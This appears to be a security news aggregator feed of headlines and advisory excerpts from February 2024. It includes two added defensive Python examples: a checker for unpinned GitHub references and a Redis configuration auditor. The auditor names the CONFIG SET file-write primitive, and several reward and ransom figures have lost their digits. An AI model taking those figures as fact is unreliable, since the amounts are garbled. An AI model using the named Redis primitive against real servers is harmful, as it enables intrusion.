China-linked APT group Mustang Panda targeted various Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS. Trend Micro researchers uncovered a cyberespionage campaign, carried out by China-linked APT group Mustang Panda, targeting Asian countries, including Taiwan, Vietnam, and Malaysia. Mustang Panda has been active since at least 2012, it targeted American and European entities such […]
https://securityaffairs.com/159464/apt/mustang-panda-doplugs-backdoor.html

USN-6649-1: Firefox vulnerabilities
Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-1547, CVE-2024-1548, CVE-2024-1549, CVE-2024-1550, CVE-2024-1553, CVE-2024-1554, CVE-2024-1555, CVE-2024-1557) Alfred Peters discovered that Firefox did not properly manage memory when storing and re-accessing data on a networking channel. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2024-1546) Johan Carlsson discovered that Firefox incorrectly handled Set-Cookie response headers in multipart HTTP responses. An attacker could potentially exploit this issue to inject arbitrary cookie...
https://ubuntu.com/security/notices/USN-6649-1

USN-6648-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51781) Zhenghan Wang discovered that the generic ID allocator implementation in the Linux kernel did not properly check for null bitmap when releasing IDs. A local attacker could use this to cause a denial of service (system crash). (CVE-2023-6915) Robert Morris discovered that the CIFS network file system implementation in the Linux kernel did not properly validate certain server commands fields, leading to an out-of-bounds read vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly...
https://ubuntu.com/security/notices/USN-6648-1

Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
CVE-2024-1708 and CVE-2024-1709 affect ConnectWise's remote desktop application ScreenConnect. This Threat Brief covers the attack scope and includes Unit 42's telemetry.
https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/

Facebook Marketplace - 77,267 breached accounts
In February 2024, 200k Facebook Marketplace records allegedly obtained from a Meta contractor in October 2023 were posted to a popular hacking forum. The data contained 77k unique email addresses alongside names, phone numbers, Facebook profile IDs and geographic locations. The data also contained bcrypt password hashes, although there is no indication these belong to the corresponding Facebook accounts.
https://haveibeenpwned.com/PwnedWebsites#FacebookMarketplace

News from two days ago (specialist press)

Joomla fixes XSS flaws that could expose sites to RCE attacks
Five vulnerabilities have been discovered in the Joomla content management system that could be leveraged to execute arbitrary code on vulnerable websites. [...]
https://www.bleepingcomputer.com/news/security/joomla-fixes-xss-flaws-that-could-expose-sites-to-rce-attacks/

Microsoft expands free logging capabilities after May breach
Microsoft has expanded free logging capabilities for all Purview Audit standard customers, including U.S. federal agencies, six months after disclosing that Chinese hackers stole U.S. government emails undetected in an Exchange Online breach between May and June 2023. [...]
https://www.bleepingcomputer.com/news/security/microsoft-expands-free-logging-capabilities-after-may-breach/

US GOV OFFERS A REWARD OF UP TO M FOR INFO ON LOCKBIT GANG MEMBERS AND AFFILIATES
U.S. government offers rewards of up to million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates. The U.S. Department of State is offering a reward of up to million for information leading to the identification or location of members of the Lockbit ransomware gang and […]
https://securityaffairs.com/159454/cyber-crime/lockbit-members-reward.html

Why SBOMs are essential for every organization
In the complicated balancing act of rapid software development and robust cybersecurity, software bills of materials (SBOMs) serve a valuable function to help secure the intricate and vast systems that constitute software supply chains.
https://blog.sonatype.com/why-sboms-are-essential-for-every-organization

Types of SaaS Applications: Categories and Examples
By Uzair Amir. Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own…
https://www.hackread.com/types-of-saas-applications-categories-and-examples/

Top Software Development Outsourcing Trends
By Uzair Amir. Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not…
https://www.hackread.com/top-software-development-outsourcing-trends/

What to Look for in a Secrets Scanner
Find out the key capabilities of secret scanners and what to consider when searching for a solution. 
https://www.legitsecurity.com/blog/what-to-look-for-in-a-secrets-scanner

New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security
By Deeba Ahmed. Migo malware campaign: a user-mode rootkit hides cryptojacking on Linux systems.
https://www.hackread.com/linux-malware-migo-exploits-redis-cryptojacking/

How to stay safe from repo-jacking
Repo-jacking is a specific type of supply chain attack. This blog post explains what it is, what the risk is, and what you can do to stay safe.
https://github.blog/2024-02-21-how-to-stay-safe-from-repo-jacking/
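The GitHub post explains repo-jacking in prose; the point for anyone consuming dependencies is that a reference by owner/repo name plus a tag or branch can be re-pointed once that name changes hands, whereas a full 40-character commit SHA cannot be silently swapped for different content. The script below is an added example, not GitHub's code: it scans a GitHub Actions workflow and a pip requirements file for GitHub references that are not pinned to a full commit SHA. The workflow, the requirements file, the "someorg" repositories and the 40-hex SHA in them are all constructed for the example.

```python
"""Flag GitHub references pinned to a mutable name instead of a commit SHA.

Added example, not GitHub's code. The workflow, requirements file, the
"someorg" repositories and the 40-hex SHA are all constructed for the example.
"""
import re

# A full 40-hex commit SHA cannot be silently swapped for other content.
SHA40 = re.compile(r"^[0-9a-f]{40}$")
# GitHub Actions step: uses: owner/repo[/sub/path]@ref (local ./ and docker:// steps never match)
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+)(?:/[^@\s]+)?@(\S+)")
# pip VCS requirement: git+https://github.com/owner/repo[.git]@ref[#egg=...]
PIP_GIT_RE = re.compile(r"git\+https://github\.com/([A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+?)(?:\.git)?@([^#\s]+)")

# Constructed workflow; the checkout SHA is made up, not a real commit.
WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: someorg/setup-tool@v2
      - uses: someorg/monorepo/actions/lint@main
      - uses: ./.github/actions/local
      - run: pip install -r requirements.txt
"""

# Constructed requirements file.
REQUIREMENTS = """\
requests==2.31.0
git+https://github.com/someorg/internal-lib.git@main#egg=internal-lib
git+https://github.com/someorg/pinned-lib@0123456789abcdef0123456789abcdef01234567
"""


def find_unpinned_github_refs(text):
    """Return (line number, owner/repo, ref) for every GitHub ref that is not a full SHA."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern in (USES_RE, PIP_GIT_RE):
            match = pattern.search(line)
            if match and not SHA40.match(match.group(2)):
                findings.append((lineno, match.group(1), match.group(2)))
    return findings


if __name__ == "__main__":
    for label, text in (("workflow", WORKFLOW), ("requirements", REQUIREMENTS)):
        for lineno, repo, ref in find_unpinned_github_refs(text):
            print(f"{label}:{lineno}: {repo}@{ref} is not pinned to a commit SHA")
```

A short (abbreviated) SHA is reported as well, since only the full hash is treated as immutable. Pinning to a SHA also means a renamed or re-registered repository fails to resolve the commit rather than handing you someone else's code, which is the failure mode you want.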

Proofpoint Welcomes New Executives to its Leadership Team

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-welcomes-new-executives-its-leadership-team

Crypto Exchange FixedFloat Hacked: Million in BTC, ETH Stolen
By Deeba Ahmed. FixedFloat lost over 1,700 Ethereum and over 400 Bitcoin to a drainer attack on February 18, 2024.
https://www.hackread.com/crypto-exchange-fixedfloat-hacked-btc-eth-stolen/

Building a Better Perimeter Defense Strategy to Meet the Challenges of 2024
By Yiyi Miao, Chief Product Officer, OPSWAT. In the ever-changing domain of cybersecurity, organizations continue to face multifaceted challenges in protecting their digital assets and infrastructure. A new report, written […]
https://www.cyberdefensemagazine.com/building-a-better-perimeter-defense-strategy-to-meet-the-challenges-of-2024/

New Redis miner Migo uses novel system weakening techniques
A new malware campaign targets Redis servers to deploy a cryptocurrency miner dubbed Migo on compromised Linux hosts. Cado Security researchers observed the campaign, which stands out for its use of several novel system-weakening techniques against the data store itself. Migo […]
https://securityaffairs.com/159447/malware/redis-miner-migo.html
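The excerpt says Migo weakens the Redis data store itself but does not say which settings it changes. As an added example, not code from Cado Security or from the Migo write-up, the check below audits a redis.conf for the exposure controls a defender would verify on any Redis host that a campaign like this could reach: a non-wildcard bind address, protected-mode left on, a requirepass, and the CONFIG command renamed away so that a client that reaches the port cannot rewrite the server's configuration at runtime. Which controls to check is an assumption of the example, the two config samples are constructed, and on Redis 6 and later ACLs can replace the rename-command approach.

```python
"""Audit a redis.conf for the exposure controls an exposed Redis host needs.

Added example, not code from Cado Security or the Migo write-up. The excerpt
does not state which settings Migo changes; the controls checked here are the
standard exposure controls and are an assumption made for this example.
"""
import shlex

WILDCARD_BINDS = {"0.0.0.0", "::", "*"}

# Constructed sample: reachable from anywhere, no authentication, CONFIG live.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed sample: the same server with the exposure controls applied.
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
rename-command DEBUG ""
"""


def parse_redis_conf(text):
    """Map directive -> list of argument lists, in file order (later entries win)."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)   # handles the quoted "" used to disable a command
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    conf = parse_redis_conf(text)
    findings = []

    binds = conf.get("bind")
    if not binds:
        findings.append("no bind directive: Redis listens on every interface")
    elif any(addr in WILDCARD_BINDS for addr in binds[-1]):
        findings.append("bind uses a wildcard address: reachable from any network")

    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode is off: remote clients are accepted even with no bind or password set")

    passwords = conf.get("requirepass", [])
    if not passwords or not passwords[-1] or not passwords[-1][0]:
        findings.append("no requirepass: anyone who reaches the port has full access")

    renamed = {args[0].upper(): args[1] for args in conf.get("rename-command", []) if len(args) == 2}
    if renamed.get("CONFIG") != "":
        findings.append("CONFIG not disabled: a client can CONFIG SET dir/dbfilename "
                        "(the classic file-write primitive) or turn protections off at runtime")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "ok")
```

The parser keeps every occurrence of a directive and the checks use the last one, matching how Redis itself resolves a directive that appears twice in the file.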

Understanding GDPR and the Importance of Employee Training
The General Data Protection Regulation (GDPR) has significantly impacted how European businesses collect, store, use,…
https://latesthackingnews.com/2024/02/21/understanding-gdpr-and-the-importance-of-employee-training/

Adarma Collaborates with Scottish Enterprise to Unveil Neurodiversity Strategy
Adarma has announced its neurodiversity strategy in partnership with Scottish Enterprise, Scotland's national economic development agency. The strategy supports Adarma's continued commitment to attract, support, and empower people from diverse backgrounds into the cybersecurity sector, which will help address the sector's well-documented skills shortage. Adarma employs over 300 people and believes […]
https://www.itsecurityguru.org/2024/02/21/adarma-collaborates-with-scottish-enterprise-to-unveil-neurodiversity-strategy/?utm_source=rss&utm_medium=rss&utm_campaign=adarma-collaborates-with-scottish-enterprise-to-unveil-neurodiversity-strategy

Cybersecurity Salary Guide: How Much Can You Earn?
This week in cybersecurity from the editors at Cybercrime Magazine. Read the full story in Forbes. Sausalito, Calif., Feb. 21, 2024. Forbes reports that as technology becomes further ingrained in daily life, cyberattacks continue to threaten businesses. Bad actors deploy new tools like artificial […]
https://cybersecurityventures.com/cybersecurity-salary-guide-how-much-can-you-earn/

USN-6647-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the ATM (Asynchronous Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51780) It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51782) It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service...
https://ubuntu.com/security/notices/USN-6647-1

New Year, New Consumer Demands in Cybersecurity: Navigating the Landscape of Consumer Expectations and App Developer Responsibility in Mobile App Security
By Alan Bavosa, VP of Security Products, Appdome. The significant growth and mass adoption of mobile applications has completely transformed the way users engage with brands. From managing finances […]
https://www.cyberdefensemagazine.com/new-year-new-consumer-demands-in-cybersecurity-navigating-the-landscape-of-consumer-expectations-and-app-developer-responsibility-in-mobile-app-security/

Vibrator virus steals your personal information
One of our customers found their vibrator was buzzing with a hint of malware.
https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information

Critical flaw found in deprecated VMware EAP. Uninstall it immediately
VMware is urging customers to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the disclosure of CVE-2024-22245, an arbitrary authentication relay flaw rated CVSS 9.6. A threat actor could trick a domain user with EAP installed in […]
https://securityaffairs.com/159441/security/critical-flaw-deprecated-vmware-eap.html

SpeedyTest - Command-Line Tool For Measuring Internet Speed
SpeedyTest is a command-line tool for measuring internet speed, aimed at network administrators, developers, or anyone who wants to monitor their connection.
Features:
- Measure download speed, upload speed, and ping latency.
- Generate detailed reports with a graphical representation of the results.
- Save and export results in various formats (CSV, JSON, etc.).
- Customize test parameters and server selection.
- Compare results over time to track performance changes.
- Integrate SpeedyTest into your own applications using the provided API.
- Track your timeline with a saved database.
Installation...
http://www.kitploit.com/2024/02/speedytest-command-line-tool-for.html

A first analysis of the i-Soon data leak
Data from a Chinese cybersecurity vendor that works for the Chinese government exposed a range of hacking tools and services.
https://www.malwarebytes.com/blog/news/2024/02/a-first-analysis-of-the-i-soon-data-leak

USN-6584-2: Libspf2 vulnerabilities
USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update provides the corresponding updates for CVE-2021-33912 and CVE-2021-33913 in Ubuntu 16.04 LTS. We apologize for the inconvenience. Original advisory details: Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code. (CVE-2021-20314) It was discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service...
https://ubuntu.com/security/notices/USN-6584-2

Microsoft Exchange flaw CVE-2024-21410 could impact up to 97,000 servers
Researchers from the Shadowserver Foundation identified roughly 28,000 internet-facing Microsoft Exchange servers vulnerable to CVE-2024-21410, out of about 97,000 that are potentially affected. CVE-2024-21410 is an elevation-of-privilege flaw in Exchange Server: an attacker who obtains a user's Net-NTLMv2 hash, for example by targeting an NTLM client such as Outlook, can relay it to the Exchange server and authenticate as that user. Microsoft fixed it in the February 2024 updates, reported it as exploited in the wild, and recommends enabling Extended Protection for Authentication on Exchange, which blocks the relay. […]
https://securityaffairs.com/159424/hacking/28000-vulnerable-microsoft-exchange-servers.html

Latest DevSecOps Guidance from Cloud Security Alliance and SAFECode Emphasizes Value of Collaboration, Integration in DevSecOps Landscape
Document provides practical insights for seamlessly embedding security in DevOps processes and workflow and examines convergence of DevSecOps with Zero Trust, MLSecOps, and AIOps SEATTLE – Feb. 21, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, today released The Six Pillars of DevSecOps - Collaboration and Integration. Written by CSA's DevSecOps...
https://cloudsecurityalliance.org/articles/latest-devsecops-guidance-from-cloud-security-alliance-and-safecode-emphasizes-value-of-collaboration-integration-in-devsecops-landscape

News from previous days

Brightening the outlook for security in the cloud
The NCSC's Cloud Security Research Lead suggests some approaches to help you get confidence in cloud services.
https://www.ncsc.gov.uk/blog-post/brightening-outlook-security-cloud

An RFC on IoCs – playing our part in international standards
The NCSC has published a new RFC on Indicators of Compromise to support cyber security in protocol design - and hopes to encourage more cyber defenders to engage with international standards.
https://www.ncsc.gov.uk/blog-post/rfc-indicators-of-compromise-for-ietf

ConnectWise fixed critical flaws in ScreenConnect remote access tool
ConnectWise has addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches as soon as possible. Both vulnerabilities were reported on February 13, 2024, through the company's vulnerability disclosure channel via the ConnectWise Trust Center. The […]
https://securityaffairs.com/159416/security/connectwise-fixed-critical-bugs.html

Mastering SBOMs: Demonstrations
In our recent webinar, Mastering SBOMs: Demonstrations, speakers including Ilkka Turunen, Field CTO, Sonatype, Robert Haas, Global DevSecOps Product Manager, DXC Technology, and Marc Luescher, Solution Architect, AWS, highlighted real-world applications of software bills of materials (SBOMs) through case studies and presented use cases for SBOM optimization.
https://blog.sonatype.com/mastering-sboms-demonstrations

USN-6646-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the ATM (Asynchronous Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51780) It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51782) It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service...
https://ubuntu.com/security/notices/USN-6646-1

High-Risk Vulnerabilities in ConnectWise ScreenConnect
On February 19, 2024 ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect 23.9.7 and earlier.
https://blog.rapid7.com/2024/02/20/etr-high-risk-vulnerabilities-in-connectwise-screenconnect/

ThreatDown EDR update: Streamlined Suspicious Activity investigation
Investigating EDR alerts just got a whole lot easier.
https://www.malwarebytes.com/blog/business/2024/02/threatdown-edr-update-streamlined-suspicious-activity-investigation

USN-6645-1: Linux kernel vulnerability
It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion).
https://ubuntu.com/security/notices/USN-6645-1

Decoding the Characteristics of Modern Pentesting: Speed
HackerOne pentest experts explore the "Speed" factor of effective pentesting methods to see how each security testing alternative measures up.
https://www.hackerone.com/penetration-testing/modern-pentesting-speed

Law enforcement trolls LockBit, reveals massive takedown
Law enforcement has humiliated the humiliators.
https://www.malwarebytes.com/blog/business/2024/02/law-enforcement-trolls-lockbit-reveals-massive-takedown

Webinar: Managing Without Governing? Why Your Organization Needs a Management System to Govern Your Information Resilience Program
https://cyberdefensewebinars.com/managing-without-governing-why-your-organization-needs-a-management-system-to-govern-your-information-resilience-program/

North Carolina Man Loses $790,000 Of Savings In Crypto Investment Scheme
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Full Cybercrime Magazine Podcast Interview Sausalito, Calif. – Feb. 20, 2024 Jim Wilkerson of Cary, N.C. is out $790,000 after he thought he found a great investment opportunity. He’s sharing his […]
https://cybersecurityventures.com/north-carolina-man-loses-790000-of-savings-in-crypto-investment-scheme/

Feds Seize LockBit Ransomware Websites, Offer Decryption Tools, Troll Affiliates
U.S. and U.K. authorities have seized the darknet websites run by LockBit, a prolific and destructive ransomware group that has claimed more than 2,000 victims worldwide and extorted over 0 million in payments. Instead of listing data stolen from ransomware victims who didn't pay, LockBit's victim shaming website now offers free recovery tools, as well as news about arrests and criminal charges involving LockBit affiliates.
https://krebsonsecurity.com/2024/02/feds-seize-lockbit-ransomware-websites-offer-decryption-tools-troll-affiliates/

Explanation of New Authenticated Scanning PCI DSS Requirement 11.3.1.2 in PCI DSS V4.0 and how InsightVM can help meet the Requirement
As a Certified Qualified Security Assessor (QSA) company and a trusted Rapid7 partner, MegaplanIT is committed to guiding organizations through the complexities of compliance and security standards.
https://blog.rapid7.com/2024/02/20/explanation-of-new-authenticated-scanning-pci-dss-requirement-11-3-1-2-in-pci-dss-v4-0-and-how-insightvm-can-help-meet-the-requirement/

Navigating NIS2 requirements with Microsoft Security solutions
NIS2 is the most comprehensive European cybersecurity directive yet, covering 18 sectors and 160,000+ companies. The Zero Trust principles addressed by Microsoft Security solutions can help you protect your organization and meet NIS2 requirements.
https://www.microsoft.com/en-us/security/blog/2024/02/20/navigating-nis2-requirements-with-microsoft-security-solutions/

How The Security of The Cloud's Supply Chain Will Shift in 2024
What we can expect from advanced threat actor groups in the new year. By Jason Martin, Co-founder and Co-CEO at Permiso Security. In 2023, we started to witness a change […]
https://www.cyberdefensemagazine.com/how-the-security-of-the-clouds-supply-chain-will-shift-in-2024/

Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware

2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics
Fundamental insights from Unit 42's 2024 Incident Response report are summarized here.
https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/

How I got started: Cyber AI/ML engineer
As generative AI goes mainstream, it highlights the increasing demand for AI cybersecurity professionals like Maria Pospelova. Pospelova is currently a senior data scientist and data science team lead at OpenText Cybersecurity. She also worked at Interset, an AI cybersecurity company acquired by Micro Focus and then by OpenText. She continues as part of that team […]
https://securityintelligence.com/articles/how-i-got-started-cyber-ai-ml-engineer/

Wyze cameras show the wrong feeds to customers. Again.
Wyze cameras allowed users access to other users' feeds once again. An estimated 13,000 people got a peek at thumbnails from another user's home.
https://www.malwarebytes.com/blog/news/2024/02/wyze-cameras-show-the-wrong-feeds-to-customers-again

Hyperautomation: Revolutionizing the Security Market
By Divakar Kolhe, Digital Marketer, Market Research Future (Part of Wantstats Research and Media Private Limited). In today’s digital age, the security landscape is constantly […]
https://www.cyberdefensemagazine.com/hyperautomation-revolutionizing-the-security-market/

USN-6625-3: Linux kernel (Raspberry Pi) vulnerabilities
Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service (paravirtualized device unavailability). (CVE-2023-34324) Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver in the Linux kernel during device removal. A privileged attacker could use this to cause a denial of service (system crash). (CVE-2023-35827) It was discovered that a race condition existed in the Linux kernel when performing operations with kernel objects, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2023-45863) 黄思聪 discovered that the...
https://ubuntu.com/security/notices/USN-6625-3

Malvertising: This cyberthreat isn't on the dark web, it's on Google
Malvertising made a resurgence in 2023, with cybercriminals creating malicious ads and websites imitating Amazon, TradingView, and Rufus.
https://www.malwarebytes.com/blog/news/2024/02/malvertising-this-cyberthreat-isnt-on-the-dark-web-its-on-google

Raccoon Infostealer operator extradited to the United States
A Ukrainian national accused of operating the Raccoon Infostealer as a Malware-as-a-Service offering has been extradited to the US.
https://www.malwarebytes.com/blog/news/2024/02/raccoon-infostealer-operator-extradited-to-the-united-states

Zoom Patched Multiple Security Vulnerabilities With Latest Update
The latest Zoom release addressed numerous security vulnerabilities in the software, including a critical flaw.…
https://latesthackingnews.com/2024/02/20/zoom-patched-multiple-security-vulnerabilities-with-latest-update/

Microsoft Patch Tuesday For February Addressed Two Zero-Days
Heads up, Microsoft users! It's now time to update your devices as Microsoft rolled out…
https://latesthackingnews.com/2024/02/20/microsoft-patch-tuesday-for-february-addressed-two-zero-days/

New Gold Pickaxe Malware Aims To Steal Users' Faces
Another threat surfaces online for mobile phone users that targets Android and iOS devices alike.…
https://latesthackingnews.com/2024/02/20/new-gold-pickaxe-malware-aims-to-steal-users-faces/

Ivanti Patched Another Vulnerability While The Former Went Under Attack
While the patches have been released, Ivanti users must rush to update their systems with…
https://latesthackingnews.com/2024/02/20/ivanti-patched-another-vulnerability-while-the-former-went-under-attack/

Sensor Intel Series: Top CVEs in January 2024
More IoT Targeting, plus a bunch of new CVEs! See what attackers went after in January 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-january-2024

LockBit, the world’s worst ransomware, is down
LockBit's position as ransomware's biggest beast is suddenly in doubt.
https://www.malwarebytes.com/blog/cybercrime/2024/02/lockbit-the-worlds-worst-ransomware-is-down

USN-6644-1: LibTIFF vulnerabilities
It was discovered that LibTIFF incorrectly handled certain files. If a user were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause the application to crash, resulting in a denial of service. (CVE-2023-52356) It was discovered that LibTIFF incorrectly handled certain image files with the tiffcp utility. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause tiffcp to crash, resulting in a denial of service. (CVE-2023-6228) It was discovered that LibTIFF incorrectly handled certain files. If a user were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause the application to consume resources, resulting in a denial of service. (CVE-2023-6277)...
https://ubuntu.com/security/notices/USN-6644-1

USN-6643-1: NPM IP vulnerability
Emre Durmaz discovered that the NPM IP package incorrectly distinguished between private and public IP addresses. A remote attacker could possibly use this issue to perform Server-Side Request Forgery (SSRF) attacks.
https://ubuntu.com/security/notices/USN-6643-1

Why keeping track of user accounts is important
CISA has issued an advisory after the discovery of documents containing information about a state government organization's network environment on a dark web brokerage site.
https://www.malwarebytes.com/blog/news/2024/02/why-keeping-track-of-user-accounts-is-important

Four Ways Genai Will Change the Contours Of The Corporate Landscape In 2024
By Neil Serebryany, CEO and Founder of CalypsoAI. Generative artificial intelligence (GenAI) models, including large language models (LLMs), have been the focal point of the business world's attention since ChatGPT […]
https://www.cyberdefensemagazine.com/four-ways-genai-will-change-the-contours-of-the-corporate-landscape-in-2024/

16 Common Types Of Cyberattacks And How To Prevent Them
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in TechTarget Sausalito, Calif. – Feb. 19, 2024 Today’s cybercriminals are not part-time amateurs or script kiddies but rather state-sponsored adversaries and professional criminals looking to steal information and make […]
https://cybersecurityventures.com/16-common-types-of-cyberattacks-and-how-to-prevent-them/

USN-6642-1: Bind vulnerabilities
Shoham Danino, Anat Bremler-Barr, Yehuda Afek, and Yuval Shavitt discovered that Bind incorrectly handled parsing large DNS messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-4408) Elias Heftrig, Haya Schulmann, Niklas Vogel, and Michael Waidner discovered that Bind incorrectly handled validating DNSSEC messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-50387) It was discovered that Bind incorrectly handled preparing an NSEC3 closest encloser proof. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-50868) It was discovered that Bind incorrectly handled...
https://ubuntu.com/security/notices/USN-6642-1

VPNs in Times of War: Why a Rise in Global Conflicts Mean Citizens Now Need VPNs More Than Ever
A NEW era of global instability is dawning. By Sebastian Schaub, CEO, hide.me. Russia's ongoing invasion of Ukraine continues to fan the flames of war in Europe. American and Chinese […]
https://www.cyberdefensemagazine.com/vpns-in-times-of-war-why-a-rise-in-global-conflicts-mean-citizens-now-need-vpns-more-than-ever/

SwaggerSpy - Automated OSINT On SwaggerHub
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals. What is Swagger? Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API. About SwaggerHub: SwaggerHub is a collaborative platform for designing, building, and managing...
http://www.kitploit.com/2024/02/swaggerspy-automated-osint-on-swaggerhub.html

Missed IWCON 2023? Catch Recorded Expert Sessions Here.
Hello hacker! Missed attending IWCON 2023 — the biggest virtual cybersecurity conference of the world? No worries, we're here at your service with a second chance. Over the next few weeks, we'll be sharing links to watch recordings of all our expert sessions. Vivek Ramachandran (speaker bio: Founder and CEO of @getsquarex), topic: From Hacker to Entrepreneur: My Cybersecurity Journey and Predictions for the Future. Jason Haddix (speaker bio: BuddoBot CISO & Hacker in Charge), topic: Recon Like an Adversary. Joseph Thacker aka rez0_ (speaker bio: Offensive security engineer at AppOmni, founder of WeHackAI), topic: AI Application Security: Understanding Prompt Injection...
https://infosecwriteups.com/missed-iwcon-2023-catch-recorded-expert-sessions-here-8d62cf34dd37?source=rss----7b722bfd1b8d---4

Getting AI Right for Security: 5 Principles
By Kevin Kennedy, SVP Products, Vectra AI. Now more than ever, companies need effective security solutions. The cost of global cybercrime is projected to grow by seventeen percent each year, […]
https://www.cyberdefensemagazine.com/getting-ai-right-for-security-5-principles/

From Virtual Visions to Tangible Profits: A Founder's Guide to Launching a vCISO Firm in 2024
By Caroline McCaffrey, CEO and Co-founder, ClearOPS. Most people find themselves in cybersecurity because they find its ever-changing landscape interesting. 2023 did not disappoint with new concerns over liability in […]
https://www.cyberdefensemagazine.com/from-virtual-visions-to-tangible-profits-a-founders-guide-to-launching-a-vciso-firm-in-2024/

HTB — Lame
First box, first own! Not so lame now, huh?
https://infosecwriteups.com/htb-lame-13b949b481dc?source=rss----7b722bfd1b8d---4

AzSubEnum - Azure Service Subdomain Enumeration
